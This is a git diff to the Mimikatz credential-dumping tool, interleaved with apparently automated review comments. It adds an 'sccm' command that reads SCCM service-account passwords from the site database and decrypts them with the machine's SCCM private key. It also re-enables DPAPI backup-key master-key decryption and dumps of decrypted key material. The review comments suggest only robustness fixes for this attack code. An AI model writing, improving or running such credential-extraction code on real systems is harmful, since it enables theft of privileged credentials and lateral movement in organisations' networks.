diff --git a/inc/globals.h b/inc/globals.h
index 6c5556b..ea87778 100644
--- a/inc/globals.h
+++ b/inc/globals.h
@@ -117,6 +117,7 @@ DWORD MIMIKATZ_NT_MAJOR_VERSION, MIMIKATZ_NT_MINOR_VERSION, MIMIKATZ_NT_BUILD_NU
 #define KULL_M_WIN_BUILD_10_1903 18362
 #define KULL_M_WIN_BUILD_10_1909 18363
 #define KULL_M_WIN_BUILD_10_2004 19041
+#define KULL_M_WIN_BUILD_10_20H2 19042
 #define KULL_M_WIN_MIN_BUILD_XP 2500
diff --git a/mimikatz/modules/dpapi/kuhl_m_dpapi.c b/mimikatz/modules/dpapi/kuhl_m_dpapi.c
index b115510..ff8e16f 100644
--- a/mimikatz/modules/dpapi/kuhl_m_dpapi.c
+++ b/mimikatz/modules/dpapi/kuhl_m_dpapi.c
@@ -290,20 +290,20 @@ NTSTATUS kuhl_m_dpapi_masterkey(int argc, wchar_t * argv[]) } } - //if(masterkeys->BackupKey && masterkeys->dwBackupKeyLen && convertedSid && (!(masterkeys->dwFlags & 1) || (pSystem && cbSystem))) - //{ - // kprintf(L"\n[backupkey] %s DPAPI_SYSTEM: ", pSystem ? L"with" : L"without"); - // if(pSystem) - // { - // kull_m_string_wprintf_hex(pSystem, cbSystem, 0); - // if(!(masterkeys->dwFlags & 1)) - // kprintf(L" (but is not needed)"); - // } - // kprintf(L"\n"); - // if(kull_m_dpapi_unprotect_backupkey_with_secret(masterkeys->dwFlags, masterkeys->BackupKey, convertedSid, pSystem, cbSystem, &output, &cbOutput)) - // kuhl_m_dpapi_display_MasterkeyInfosAndFree(NULL, output, cbOutput, NULL); - // else PRINT_ERROR(L"kull_m_dpapi_unprotect_backupkey_with_secret\n"); - //} + if(masterkeys->BackupKey && masterkeys->dwBackupKeyLen && convertedSid && (!(masterkeys->dwFlags & 1) || (pSystem && cbSystem))) + { + kprintf(L"\n[backupkey] %s DPAPI_SYSTEM: ", pSystem ? L"with" : L"without"); + if(pSystem) + { + kull_m_string_wprintf_hex(pSystem, cbSystem, 0); + if(!(masterkeys->dwFlags & 1)) + kprintf(L" (but is not needed)"); + } + kprintf(L"\n"); + if(kull_m_dpapi_unprotect_backupkey_with_secret(masterkeys->dwFlags, masterkeys->BackupKey, convertedSid, pSystem, cbSystem, &output, &cbOutput)) + kuhl_m_dpapi_display_MasterkeyInfosAndFree(NULL, output, cbOutput, NULL); + else PRINT_ERROR(L"kull_m_dpapi_unprotect_backupkey_with_secret\n"); + } if(masterkeys->DomainKey && masterkeys->dwDomainKeyLen) { diff --git a/mimikatz/modules/kuhl_m_misc.c b/mimikatz/modules/kuhl_m_misc.c index 73f0965..5071a4b 100644 --- a/mimikatz/modules/kuhl_m_misc.c +++ b/mimikatz/modules/kuhl_m_misc.c 
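Review bot: The re-enabled `[backupkey]` block tests the bare literal `masterkeys->dwFlags & 1` twice, and nothing in the hunk says what bit 0 stands for. Judging by `isDPAPISecret = flags & 1` in kull_m_dpapi_unprotect_backupkey_with_secret (restored by the same commit), it marks a backup key that needs the DPAPI_SYSTEM secret. A one-line comment above the condition, `/* dwFlags bit 0: backup key is bound to the DPAPI_SYSTEM secret */`, or a named constant shared with the callee would make the `(but is not needed)` branch readable without opening the other file. kuhl_m_dpapi_masterkey starts and ends outside the hunk.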
@@ -28,6 +28,7 @@ const KUHL_M_C kuhl_m_c_misc[] = { {kuhl_m_misc_aadcookie, L"aadcookie", NULL}, {kuhl_m_misc_aadcookie_NgcSignWithSymmetricPopKey, L"ngcsign", NULL}, {kuhl_m_misc_spooler, L"spooler", NULL}, + {kuhl_m_misc_sccm_accounts, L"sccm", NULL}, }; const KUHL_M kuhl_m_misc = { L"misc", L"Miscellaneous module", NULL, 
@@ -1398,4 +1399,139 @@ NTSTATUS kuhl_m_misc_spooler(int argc, wchar_t * argv[]) else PRINT_ERROR(L"missing /server argument to specify spooler server"); return STATUS_SUCCESS; -} \ No newline at end of file +} + +typedef struct _SCCM_ENCRYPTED_HEADER { + DWORD cbKey; + DWORD cbDecrypted; + BYTE data[ANYSIZE_ARRAY]; +} SCCM_ENCRYPTED_HEADER, *PSCCM_ENCRYPTED_HEADER; + +const wchar_t SCCM_QUERY[] = L"SELECT SiteNumber, UserName, Password, Availability FROM SC_UserAccount"; +NTSTATUS kuhl_m_misc_sccm_accounts(int argc, wchar_t * argv[]) +{ + LPCWCHAR szConnectionString, szPrivateKeyContainer; + + SQLHANDLE hEnv, hCon, hSmt; + SQLRETURN ret; + unsigned long int SiteNumber; + char UserName[60], Password[2048]; + BYTE Availability; + SQLLEN szUserName, szPassword; + + PSCCM_ENCRYPTED_HEADER pEncrypted; + HCRYPTPROV hProv; + HCRYPTKEY hKey; + ALG_ID algid; + DWORD cbEncrypted, dwKeySetFlags, cbBuffer; + + kull_m_string_args_byName(argc, argv, L"keycontainer", &szPrivateKeyContainer, L"Microsoft Systems Management Server"); + dwKeySetFlags = kull_m_string_args_byName(argc, argv, L"keyuser", NULL, NULL) ? 0 : CRYPT_MACHINE_KEYSET; + + kprintf(L"[CRYPTO] Private Key Container: %s (%s)\n", szPrivateKeyContainer, (dwKeySetFlags == CRYPT_MACHINE_KEYSET) ? 
L"machine" : L"user"); + + if(kull_m_string_args_byName(argc, argv, L"connectionstring", &szConnectionString, NULL)) + { + kprintf(L"[ SQL ] ConnectionString: %s\n", szConnectionString); + + SQLAllocHandle(SQL_HANDLE_ENV, SQL_NULL_HANDLE, &hEnv); + SQLSetEnvAttr(hEnv, SQL_ATTR_ODBC_VERSION, (SQLPOINTER)SQL_OV_ODBC3, 0); + SQLAllocHandle(SQL_HANDLE_DBC, hEnv, &hCon); + + ret = SQLDriverConnect(hCon, NULL, (SQLWCHAR*) szConnectionString, SQL_NTS, NULL, 0, NULL, SQL_DRIVER_NOPROMPT); + switch (ret) + { + case SQL_SUCCESS: + case SQL_SUCCESS_WITH_INFO: + SQLAllocHandle(SQL_HANDLE_STMT, hCon, &hSmt); + + kprintf(L"[ SQL ] Query to accounts: %s\n", SCCM_QUERY); + ret = SQLExecDirect(hSmt, (SQLWCHAR *) SCCM_QUERY, SQL_NTS); + if (ret == SQL_SUCCESS) + { + /* To avoid a lots of them */ + kprintf(L"[CRYPTO] Acquiring local SCCM RSA Private Key\n"); + if (CryptAcquireContext(&hProv, szPrivateKeyContainer, NULL, PROV_RSA_AES, dwKeySetFlags | CRYPT_SILENT)) + { + /**/ + kprintf(L"\n"); + while (SQLFetch(hSmt) == SQL_SUCCESS) + { + ret = SQLGetData(hSmt, 1, SQL_C_ULONG, &SiteNumber, sizeof(SiteNumber), NULL); + if (ret == SQL_SUCCESS) + { + ret = SQLGetData(hSmt, 2, SQL_C_CHAR, UserName, sizeof(UserName), &szUserName); + if (ret == SQL_SUCCESS) + { + ret = SQLGetData(hSmt, 3, SQL_C_CHAR, Password, sizeof(Password), &szPassword); + if (ret == SQL_SUCCESS) + { + ret = SQLGetData(hSmt, 4, SQL_C_TINYINT, &Availability, sizeof(Availability), NULL); + if (ret == SQL_SUCCESS) + { + kprintf(L"[%u-%hhu] %.*S - ", SiteNumber, Availability, szUserName, UserName); + if (kull_m_crypto_StringToBinaryA(Password, (DWORD)szPassword, CRYPT_STRING_HEX, (PBYTE*)&pEncrypted, &cbEncrypted)) + { + if (!Availability) + { + if (CryptImportKey(hProv, pEncrypted->data, pEncrypted->cbKey, 0, 0, &hKey)) + { + cbBuffer = sizeof(ALG_ID); + if (CryptGetKeyParam(hKey, KP_ALGID, (BYTE*)&algid, &cbBuffer, 0)) + { + kprintf(L"[%s] ", kull_m_crypto_algid_to_name(algid)); + } + + cbBuffer = cbEncrypted - 
FIELD_OFFSET(SCCM_ENCRYPTED_HEADER, data) - pEncrypted->cbKey; + if (CryptDecrypt(hKey, 0, TRUE, 0, pEncrypted->data + pEncrypted->cbKey, &cbBuffer)) + { + if (cbBuffer == pEncrypted->cbDecrypted) + { + kprintf(L"%.*S\n", cbBuffer, pEncrypted->data + pEncrypted->cbKey); + } + else PRINT_ERROR(L"cbBuffer != cbDecrypted"); + } + else PRINT_ERROR_AUTO(L"CryptDecrypt"); + + CryptDestroyKey(hKey); + } + else PRINT_ERROR_AUTO(L"CryptImportKey"); + } + else kprintf(L"{todo if needed} \n"); // SELECT Name, Value1, Value2 FROM SC_SiteDefinition_Property WHERE Name LIKE 'GlobalAccount:%' (AES256 decrypt) + + LocalFree(pEncrypted); + } + } + else PRINT_ERROR(L"SQLGetData(Availability): %u (0x%08x)\n", ret, ret); + } + else PRINT_ERROR(L"SQLGetData(Password): %u (0x%08x)\n", ret, ret); + } + else PRINT_ERROR(L"SQLGetData(UserName): %u (0x%08x)\n", ret, ret); + } + else PRINT_ERROR(L"SQLGetData(SiteNumber): %u (0x%08x)\n", ret, ret); + } + kprintf(L"\n"); + /**/ + kprintf(L"[CRYPTO] Releasing local SCCM RSA Private Key\n"); + CryptReleaseContext(hProv, 0); + } + else PRINT_ERROR_AUTO(L"CryptAcquireContext"); + /* No more crypto */ + } + else PRINT_ERROR(L"SQLExecDirect: %u (0x%08x)\n", ret, ret); + SQLFreeHandle(SQL_HANDLE_STMT, hSmt); + + break; + + default: + PRINT_ERROR(L"SQLDriverConnect: %u (0x%08x)\n", ret, ret); + } + + SQLDisconnect(hCon); + SQLFreeHandle(SQL_HANDLE_DBC, hCon); + SQLFreeHandle(SQL_HANDLE_ENV, hEnv); + } + else PRINT_ERROR(L"/connectionstring is needed, example: /connectionstring:\"DRIVER={SQL Server};Trusted=true;DATABASE=CM_PRD;SERVER=myserver.fqdn\\instancename;\"\n"); + + return STATUS_SUCCESS; +} diff --git a/mimikatz/modules/kuhl_m_misc.h b/mimikatz/modules/kuhl_m_misc.h index bb879a9..b7635de 100644 --- a/mimikatz/modules/kuhl_m_misc.h +++ b/mimikatz/modules/kuhl_m_misc.h 
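Review bot: `pEncrypted->cbKey` is read straight from the hex-decoded `Password` column and never compared with `cbEncrypted`. It is passed as the blob length to `CryptImportKey`, and `cbBuffer = cbEncrypted - FIELD_OFFSET(SCCM_ENCRYPTED_HEADER, data) - pEncrypted->cbKey` wraps around as a DWORD when the decoded buffer is shorter than the header plus `cbKey`, so `CryptDecrypt` is asked to work in place on more bytes than `LocalAlloc` returned. Before the `if (!Availability)` branch touches the fields, add `if (cbEncrypted < FIELD_OFFSET(SCCM_ENCRYPTED_HEADER, data) || pEncrypted->cbKey > cbEncrypted - FIELD_OFFSET(SCCM_ENCRYPTED_HEADER, data))` and report the row as malformed. In the same loop, `szUserName` and `szPassword` can be `SQL_NULL_DATA` even when `SQLGetData` returns `SQL_SUCCESS`, so both should be checked for a negative value before `(DWORD)szPassword` and the `%.*S` precision use them. The `SQLLEN` precision argument should also be cast to `int`.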
@@ -15,6 +15,12 @@ #include "../../modules/kull_m_crypto_ngc.h" #include "../../modules/rpc/kull_m_rpc_ms-rprn.h" #include +#include +#pragma warning(push) +#pragma warning(disable:4201) +#include +#pragma warning(pop) +#include const KUHL_M kuhl_m_misc; @@ -38,6 +44,7 @@ NTSTATUS kuhl_m_misc_xor(int argc, wchar_t * argv[]); NTSTATUS kuhl_m_misc_aadcookie(int argc, wchar_t * argv[]); NTSTATUS kuhl_m_misc_aadcookie_NgcSignWithSymmetricPopKey(int argc, wchar_t * argv[]); NTSTATUS kuhl_m_misc_spooler(int argc, wchar_t * argv[]); +NTSTATUS kuhl_m_misc_sccm_accounts(int argc, wchar_t * argv[]); BOOL CALLBACK kuhl_m_misc_detours_callback_process(PSYSTEM_PROCESS_INFORMATION pSystemProcessInformation, PVOID pvArg); BOOL CALLBACK kuhl_m_misc_detours_callback_module(PKULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION pModuleInformation, PVOID pvArg); diff --git a/modules/kull_m_crypto.c b/modules/kull_m_crypto.c index 4c3fec4..2df9264 100644 --- a/modules/kull_m_crypto.c +++ b/modules/kull_m_crypto.c @@ -357,7 +357,7 @@ BOOL kull_m_crypto_hkey_session(ALG_ID calgid, LPCVOID key, DWORD keyLen, DWORD if(CryptAcquireContext(hSessionProv, container, NULL, PROV_RSA_AES, CRYPT_NEWKEYSET)) { hPrivateKey = 0; - if(CryptGenKey(*hSessionProv, AT_KEYEXCHANGE, CRYPT_EXPORTABLE | RSA1024BIT_KEY, &hPrivateKey)) // 1024 + if(CryptGenKey(*hSessionProv, AT_KEYEXCHANGE, CRYPT_EXPORTABLE | (RSA1024BIT_KEY / 2), &hPrivateKey)) // 1024 { if(CryptExportKey(hPrivateKey, 0, PRIVATEKEYBLOB, 0, NULL, &dwkeyblob)) { @@ -384,7 +384,7 @@ BOOL kull_m_crypto_hkey_session(ALG_ID calgid, LPCVOID key, DWORD keyLen, DWORD if(CryptImportKey(*hSessionProv, keyblob, dwkeyblob, 0, 0, &hPrivateKey)) { - dwkeyblob = (1024 / 8) + sizeof(ALG_ID) + sizeof(BLOBHEADER); // 1024 + dwkeyblob = (1024 / 2 / 8) + sizeof(ALG_ID) + sizeof(BLOBHEADER); // 1024 if(pbSessionBlob = (LPBYTE)LocalAlloc(LPTR, dwkeyblob)) { ((BLOBHEADER *) pbSessionBlob)->bType = SIMPLEBLOB; 
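Review bot: Halving the modulus in kull_m_crypto_hkey_session also halves the largest `keyLen` the SIMPLEBLOB can hold, and no bound on `keyLen` is visible in these hunks. The padding loop in the following hunk computes `dwkeyblob - (sizeof(ALG_ID) + sizeof(BLOBHEADER) + keyLen + 3)` in unsigned arithmetic, so an oversized key would wrap the loop limit; a guard such as `if(keyLen + 11 > 512 / 8) return FALSE;` before the allocation would close that, unless a check already exists outside the hunks. Both trailing `// 1024` comments (hunks -357 and -384) are now stale, and the size is written two different ways, `RSA1024BIT_KEY / 2` and `1024 / 2 / 8`. One named constant used in both places, with a comment on why 512 bits is acceptable for this wrapping key, would keep the two in step.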
@@ -401,6 +401,7 @@ BOOL kull_m_crypto_hkey_session(ALG_ID calgid, LPCVOID key, DWORD keyLen, DWORD for (i = 0; i < dwkeyblob - (sizeof(ALG_ID) + sizeof(BLOBHEADER) + keyLen + 3); i++) if (ptr[i] == 0) ptr[i] = 0x42; pbSessionBlob[dwkeyblob - 2] = 2; + status = CryptImportKey(*hSessionProv, pbSessionBlob, dwkeyblob, hPrivateKey, flags, hSessionKey); LocalFree(pbSessionBlob); } @@ -1300,5 +1301,34 @@ BOOL kull_m_crypto_dh_simpleDecrypt(HCRYPTKEY key, LPVOID data, DWORD dataLen, L } CryptDestroyKey(hTmp); } + return status; +} + +BOOL kull_m_crypto_StringToBinaryA(LPCSTR pszString, DWORD cchString, DWORD dwFlags, PBYTE* ppbBinary, PDWORD pcbBinary) +{ + BOOL status = FALSE; + + *ppbBinary = NULL; + *pcbBinary = 0; + + if (CryptStringToBinaryA(pszString, cchString, dwFlags, NULL, pcbBinary, NULL, NULL)) + { + *ppbBinary = (PBYTE)LocalAlloc(LPTR, *pcbBinary); + if (*ppbBinary) + { + if (CryptStringToBinaryA(pszString, cchString, dwFlags, *ppbBinary, pcbBinary, NULL, NULL)) + { + status = TRUE; + } + else + { + PRINT_ERROR_AUTO(L"CryptStringToBinaryA(data)"); + *ppbBinary = (PBYTE)LocalFree(*ppbBinary); + *pcbBinary = 0; + } + } + } + else PRINT_ERROR_AUTO(L"CryptStringToBinaryA(init)"); + return status; } \ No newline at end of file diff --git a/modules/kull_m_crypto.h b/modules/kull_m_crypto.h index ee1421b..802b2dc 100644 --- a/modules/kull_m_crypto.h +++ b/modules/kull_m_crypto.h 
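Review bot: When `LocalAlloc` fails in kull_m_crypto_StringToBinaryA, the function returns FALSE without logging and leaves `*pcbBinary` holding the size from the probing call while `*ppbBinary` is NULL; the other two failure paths print an error. Adding `else { PRINT_ERROR_AUTO(L"LocalAlloc"); *pcbBinary = 0; }` to the `if (*ppbBinary)` test makes the outputs consistent on every failure. The function also has no header comment; something like `/* On success *ppbBinary is a LocalAlloc'd buffer of *pcbBinary bytes; the caller releases it with LocalFree */` would record the ownership the caller in kuhl_m_misc_sccm_accounts already relies on.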
@@ -199,6 +199,7 @@ PKIWI_DH kull_m_crypto_dh_Create(ALG_ID targetSessionKeyType); BOOL kull_m_crypto_dh_CreateSessionKey(PKIWI_DH dh, PMIMI_PUBLICKEY publicKey); BOOL kull_m_crypto_dh_simpleEncrypt(HCRYPTKEY key, LPVOID data, DWORD dataLen, LPVOID *out, DWORD *outLen); BOOL kull_m_crypto_dh_simpleDecrypt(HCRYPTKEY key, LPVOID data, DWORD dataLen, LPVOID *out, DWORD *outLen); +BOOL kull_m_crypto_StringToBinaryA(LPCSTR pszString, DWORD cchString, DWORD dwFlags, PBYTE* ppbBinary, PDWORD pcbBinary); #define IOCTL_GET_FEATURE_REQUEST SCARD_CTL_CODE(3400) #define IOCTL_CCID_ESCAPE SCARD_CTL_CODE(3500) diff --git a/modules/kull_m_dpapi.c b/modules/kull_m_dpapi.c index d958dc2..6006f25 100644 --- a/modules/kull_m_dpapi.c +++ b/modules/kull_m_dpapi.c 
@@ -828,41 +828,41 @@ BOOL kull_m_dpapi_protect_masterkey_with_shaDerivedkey(PKULL_M_DPAPI_MASTERKEY m return status; } -//BOOL kull_m_dpapi_unprotect_backupkey_with_secret(DWORD flags, PKULL_M_DPAPI_MASTERKEY masterkey, PCWSTR sid, LPCVOID secret, DWORD secretLen, PVOID *output, DWORD *outputLen) -//{ -// BOOL status = FALSE, isDPAPISecret = flags & 1; -// LPCBYTE ptrSecret = (LPCBYTE) secret; -// PVOID data, hash; -// ALG_ID algID = (masterkey->algHash == CALG_SHA_512) ? CALG_SHA_512 : CALG_SHA1; -// DWORD sidLen = (DWORD) (wcslen(sid) + 1) * sizeof(wchar_t), hashSize = kull_m_crypto_hash_len(algID), dataSize = sidLen; -// -// if(!isDPAPISecret || (isDPAPISecret && ptrSecret && secretLen)) -// { -// if(secretLen == 2 * SHA_DIGEST_LENGTH + sizeof(DWORD)) -// { -// ptrSecret += sizeof(DWORD); -// secretLen -= sizeof(DWORD); -// } -// if(isDPAPISecret) -// dataSize += secretLen; -// if(data = (PBYTE) LocalAlloc(LPTR, dataSize)) -// { -// RtlCopyMemory(data, sid, sidLen); -// if(isDPAPISecret) -// RtlCopyMemory((PBYTE) data + sidLen, ptrSecret, secretLen); -// -// if(hash = LocalAlloc(LPTR, hashSize)) -// { -// if(kull_m_crypto_hash(algID, data, dataSize, hash, hashSize)) -// status = kull_m_dpapi_unprotect_masterkey_with_shaDerivedkey(masterkey, hash, hashSize, output, outputLen); -// LocalFree(hash); -// } -// LocalFree(data); -// } -// } -// else PRINT_ERROR(L"This backup key need DPAPI_SYSTEM secret\n"); -// return status; -//} +BOOL kull_m_dpapi_unprotect_backupkey_with_secret(DWORD flags, PKULL_M_DPAPI_MASTERKEY masterkey, PCWSTR sid, LPCVOID secret, DWORD secretLen, PVOID *output, DWORD *outputLen) +{ + BOOL status = FALSE, isDPAPISecret = flags & 1; + LPCBYTE ptrSecret = (LPCBYTE) secret; + PVOID data, hash; + ALG_ID algID = (masterkey->algHash == CALG_SHA_512) ? 
CALG_SHA_512 : CALG_SHA1; + DWORD sidLen = (DWORD) (wcslen(sid) + 1) * sizeof(wchar_t), hashSize = kull_m_crypto_hash_len(algID), dataSize = sidLen; + + if(!isDPAPISecret || (isDPAPISecret && ptrSecret && secretLen)) + { + if(secretLen == 2 * SHA_DIGEST_LENGTH + sizeof(DWORD)) + { + ptrSecret += sizeof(DWORD); + secretLen -= sizeof(DWORD); + } + if(isDPAPISecret) + dataSize += secretLen; + if(data = (PBYTE) LocalAlloc(LPTR, dataSize)) + { + RtlCopyMemory(data, sid, sidLen); + if(isDPAPISecret) + RtlCopyMemory((PBYTE) data + sidLen, ptrSecret, secretLen); + + if(hash = LocalAlloc(LPTR, hashSize)) + { + if(kull_m_crypto_hash(algID, data, dataSize, hash, hashSize)) + status = kull_m_dpapi_unprotect_masterkey_with_shaDerivedkey(masterkey, hash, hashSize, output, outputLen); + LocalFree(hash); + } + LocalFree(data); + } + } + else PRINT_ERROR(L"This backup key need DPAPI_SYSTEM secret\n"); + return status; +} BOOL kull_m_dpapi_unprotect_domainkey_with_key(PKULL_M_DPAPI_MASTERKEY_DOMAINKEY domainkey, LPCVOID key, DWORD keyLen, PVOID *output, DWORD *outputLen, PSID *sid) { 
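Review bot: kull_m_dpapi_unprotect_backupkey_with_secret reads `masterkey->algHash` and calls `wcslen(sid)` in its declarations, before any argument has been checked, and the commit now exports it through kull_m_dpapi.h. The one caller visible in this diff tests `convertedSid` first, but any other caller passing a NULL SID or master key would fault on the first line. Either state the precondition above the function, `/* masterkey and sid must be non-NULL; secret/secretLen are required when (flags & 1) */`, or compute `sidLen` and `algID` below an `if(masterkey && sid)` guard. The same comment is a good place to say that a 44-byte secret has its leading DWORD skipped, which the `2 * SHA_DIGEST_LENGTH + sizeof(DWORD)` test does silently.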
@@ -885,11 +885,11 @@ BOOL kull_m_dpapi_unprotect_domainkey_with_key(PKULL_M_DPAPI_MASTERKEY_DOMAINKEY RtlCopyMemory(rsa_buffer, domainkey->pbSecret, cbOutput); if(CryptDecrypt(hKey, 0, TRUE, 0, (PBYTE) rsa_buffer, &cbOutput)) { - //kprintf(L"\nRSA decrypt is a success\n"); - //kprintf(L" * MasterKey len: %u\n", rsa_buffer->cbMasterKey); - //kull_m_string_wprintf_hex(rsa_buffer->buffer, rsa_buffer->cbMasterKey, 1 | (16 << 16)); - //kprintf(L" * SuppKey len: %u\n", rsa_buffer->cbSuppKey); - //kull_m_string_wprintf_hex(rsa_buffer->buffer + rsa_buffer->cbMasterKey, rsa_buffer->cbSuppKey, 1 | (16 << 16)); + kprintf(L"\nRSA decrypt is a success\n"); + kprintf(L" * MasterKey len: %u\n", rsa_buffer->cbMasterKey); + kull_m_string_wprintf_hex(rsa_buffer->buffer, rsa_buffer->cbMasterKey, 1 | (16 << 16)); + kprintf(L" * SuppKey len: %u\n", rsa_buffer->cbSuppKey); + kull_m_string_wprintf_hex(rsa_buffer->buffer + rsa_buffer->cbMasterKey, rsa_buffer->cbSuppKey, 1 | (16 << 16)); if(kull_m_crypto_hkey(hProv, CALG_3DES, rsa_buffer->buffer + rsa_buffer->cbMasterKey, 192 / 8, 0, &hSessionKey, &hSessionProv)) { if(CryptSetKeyParam(hSessionKey, KP_IV, rsa_buffer->buffer + rsa_buffer->cbMasterKey + 192 / 8, 0)) 
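Review bot: The re-enabled dumps take their lengths from freshly decrypted buffers before anything has validated them. In this hunk `rsa_buffer->cbMasterKey` and `rsa_buffer->cbSuppKey` size two `kull_m_string_wprintf_hex` calls without being compared with `cbOutput`. In the next hunk (-903) `des_buffer->dataLen` sizes the nonce dump and positions `pSid` for `kull_m_string_displaySID`, ahead of the `RtlEqualMemory` SHA1 comparison that would reject a bad decrypt. With a wrong or corrupted key those fields are arbitrary and the prints can read past the allocation. Move the -903 prints below the digest check and bound the RSA ones with `if(rsa_buffer->cbMasterKey <= cbOutput && rsa_buffer->cbSuppKey <= cbOutput - rsa_buffer->cbMasterKey)`, tightened by the structure's header size, which is not visible here. kull_m_dpapi_unprotect_domainkey_with_key starts and ends outside both hunks.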
@@ -903,14 +903,14 @@ BOOL kull_m_dpapi_unprotect_domainkey_with_key(PKULL_M_DPAPI_MASTERKEY_DOMAINKEY if(CryptDecrypt(hSessionKey, 0, FALSE, 0, (PBYTE) des_buffer, &cbOutput)) { pSid = (PSID) (des_buffer->data + des_buffer->dataLen); - //kprintf(L"\n3DES decrypt is a success too\n"); - ////kull_m_string_wprintf_hex(des_buffer, outSize, 1 | (16 << 16)); kprintf(L"\n"); - //kprintf(L" * nonce : "); kull_m_string_wprintf_hex(des_buffer->data, des_buffer->dataLen, 0); kprintf(L"\n"); // try to leave it as is =) - //kprintf(L" * SID : "); kull_m_string_displaySID(pSid); kprintf(L"\n"); - //kprintf(L" * SHA1 : "); kull_m_string_wprintf_hex((PBYTE) des_buffer + cbOutput - SHA_DIGEST_LENGTH, SHA_DIGEST_LENGTH, 0); kprintf(L"\n"); + kprintf(L"\n3DES decrypt is a success too\n"); + kull_m_string_wprintf_hex(des_buffer, cbOutput, 1 | (16 << 16)); kprintf(L"\n"); + kprintf(L" * nonce : "); kull_m_string_wprintf_hex(des_buffer->data, des_buffer->dataLen, 0); kprintf(L"\n"); // try to leave it as is =) + kprintf(L" * SID : "); kull_m_string_displaySID(pSid); kprintf(L"\n"); + kprintf(L" * SHA1 : "); kull_m_string_wprintf_hex((PBYTE) des_buffer + cbOutput - SHA_DIGEST_LENGTH, SHA_DIGEST_LENGTH, 0); kprintf(L"\n"); if(kull_m_crypto_hash(CALG_SHA1, des_buffer, cbOutput - SHA_DIGEST_LENGTH, digest, SHA_DIGEST_LENGTH)) { - //kprintf(L" > Calc SHA1: "); kull_m_string_wprintf_hex(digest, SHA_DIGEST_LENGTH, 0); kprintf(L"\n"); + kprintf(L" > Calc SHA1: "); kull_m_string_wprintf_hex(digest, SHA_DIGEST_LENGTH, 0); kprintf(L"\n"); if(RtlEqualMemory((PBYTE) des_buffer + cbOutput - SHA_DIGEST_LENGTH, digest, SHA_DIGEST_LENGTH)) { *outputLen = rsa_buffer->cbMasterKey; diff --git a/modules/kull_m_dpapi.h b/modules/kull_m_dpapi.h index 2617076..7b23d62 100644 --- a/modules/kull_m_dpapi.h +++ b/modules/kull_m_dpapi.h 
@@ -186,7 +186,7 @@ BOOL kull_m_dpapi_protect_masterkey_with_password(DWORD flags, PKULL_M_DPAPI_MAS
 BOOL kull_m_dpapi_protect_masterkey_with_userHash(PKULL_M_DPAPI_MASTERKEY masterkey, LPCVOID userHash, DWORD userHashLen, PCWSTR sid, BOOL isKeyOfProtectedUser, LPCVOID pbKey, DWORD dwKey, OPTIONAL LPCVOID pbInternalSalt);
 BOOL kull_m_dpapi_protect_masterkey_with_shaDerivedkey(PKULL_M_DPAPI_MASTERKEY masterkey, LPCVOID shaDerivedkey, DWORD shaDerivedkeyLen, LPCVOID pbKey, DWORD dwKey, OPTIONAL LPCVOID pbInternalSalt);
-//BOOL kull_m_dpapi_unprotect_backupkey_with_secret(DWORD flags, PKULL_M_DPAPI_MASTERKEY masterkey, PCWSTR sid, LPCVOID secret, DWORD secretLen, PVOID *output, DWORD *outputLen);
+BOOL kull_m_dpapi_unprotect_backupkey_with_secret(DWORD flags, PKULL_M_DPAPI_MASTERKEY masterkey, PCWSTR sid, LPCVOID secret, DWORD secretLen, PVOID *output, DWORD *outputLen);
 BOOL kull_m_dpapi_unprotect_domainkey_with_key(PKULL_M_DPAPI_MASTERKEY_DOMAINKEY domainkey, LPCVOID key, DWORD keyLen, PVOID *output, DWORD *outputLen, PSID *sid);
 BOOL kull_m_dpapi_unprotect_domainkey_with_rpc(PKULL_M_DPAPI_MASTERKEYS masterkeys, PVOID rawMasterkeys, LPCWSTR server, PVOID *output, DWORD *outputLen);
diff --git a/modules/rpc/kull_m_rpc_ms-rprn.h b/modules/rpc/kull_m_rpc_ms-rprn.h
index 16ce7ea..ee5dac9 100644
--- a/modules/rpc/kull_m_rpc_ms-rprn.h
+++ b/modules/rpc/kull_m_rpc_ms-rprn.h
@@ -1,9 +1,9 @@
 #pragma once
 #include "kull_m_rpc.h"
-
+/*
 #define PRINTER_CHANGE_ADD_JOB 0x00000100
 #define PRINTER_CHANGE_ALL 0x7777FFFF
-
+*/
 #define PRINTER_NOTIFY_CATEGORY_ALL 0x00010000
 typedef void *PRINTER_HANDLE;
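Review bot: Commenting the two `PRINTER_CHANGE_*` defines out with `/* */` in kull_m_rpc_ms-rprn.h leaves dead text in the header and gives no reason for the change. Presumably they now collide with a system header pulled in by the includes added to kuhl_m_misc.h in this commit. If so, wrapping each define as `#ifndef PRINTER_CHANGE_ADD_JOB` … `#endif` keeps this header usable on its own and documents why. If the values are no longer needed at all, deleting the two lines is cleaner than leaving them commented out.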